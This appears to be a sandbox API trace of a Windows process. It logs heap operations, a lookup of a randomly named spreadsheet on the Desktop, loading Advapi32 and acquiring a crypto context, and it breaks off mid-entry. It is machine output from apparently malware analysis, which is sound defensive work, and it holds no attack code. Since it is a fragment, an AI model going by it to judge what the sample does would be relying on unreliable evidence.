RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0216.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0216.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0216.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0216.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0216.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0216.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0216.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0216.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0216.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0216.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0216.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0216.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0216.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0216.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0216.211] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/_BsqZItCPNq0eBuQ.xls", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc381a090, ftCreationTime.dwHighDateTime=0x1d5f02b, ftLastAccessTime.dwLowDateTime=0x892f8260, ftLastAccessTime.dwHighDateTime=0x1d5e697, ftLastWriteTime.dwLowDateTime=0x892f8260, ftLastWriteTime.dwHighDateTime=0x1d5e697, nFileSizeHigh=0x0, nFileSizeLow=0x80a1, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="_BsqZItCPNq0eBuQ.xls", cAlternateFileName="_BSQZI~1.XLS")) returned 0xa87490 [0216.211] FindClose (in: hFindFile=0xa87490 | out: hFindFile=0xa87490) returned 1 [0216.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0216.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0216.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0216.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0216.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0216.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0216.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0216.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0216.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0216.212] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0216.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0216.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0216.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0216.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0216.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0216.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0216.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0216.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0216.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0216.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0216.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0216.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0216.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0216.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0216.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0216.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0216.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0216.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0216.212] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0216.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0216.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0216.212] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0216.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0216.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0216.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50458 [0216.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0216.212] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0216.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0216.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff48 [0216.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0216.213] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0216.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff48 | out: hHeap=0x970000) returned 1 [0216.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0216.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50518 [0216.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0216.213] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0216.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0216.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0216.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0216.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0216.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0216.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0216.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0216.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0216.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0216.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0216.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0216.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0216.214] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0216.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0216.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0216.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0216.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0216.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0216.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0216.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0216.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0216.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0216.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0216.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0216.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0216.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0216.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0216.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0216.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0216.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0216.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0216.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0216.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0216.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0216.214] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0216.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0216.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0216.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0216.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0216.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0216.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0216.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0216.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0216.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0216.215] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0216.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0216.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0216.215] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0216.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc00 [0216.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0216.215] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0216.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc00 | out: hHeap=0x970000) returned 1 [0216.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0216.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0216.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c18 [0216.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0216.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0216.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0216.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0216.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505a8 [0216.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0216.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0216.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0216.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0216.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0216.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0216.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0216.216] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0216.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0216.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0216.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0216.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0216.216] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0216.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0216.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0216.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0216.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0216.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0216.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0216.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0216.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0216.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0216.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0216.216] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0216.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0216.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0216.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0216.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0216.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0216.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0216.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0216.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0216.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0216.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0216.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0216.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0216.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0216.217] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0216.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0216.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0216.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0216.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0216.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0216.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0216.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0216.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0216.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0216.217] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0216.217] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0216.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0216.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0216.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0216.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0216.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0216.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0216.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0216.218] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0216.218] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0216.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fce0 | out: hHeap=0x970000) returned 1 [0216.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0216.218] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0216.218] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0216.218] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0216.218] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69b28, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0216.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0216.218] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0216.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15) returned 0x2e699c8 [0216.218] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e699c8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0216.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0216.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0216.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0216.219] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0216.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0216.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0216.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0216.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0216.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ba8 [0216.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0216.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0216.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0216.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0216.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0216.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0216.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0216.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0216.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0216.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0216.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0216.271] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0216.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0216.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0216.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0216.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0216.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0216.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0216.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0216.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0216.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0216.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0216.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0216.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0216.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0216.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0216.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0216.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0216.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: 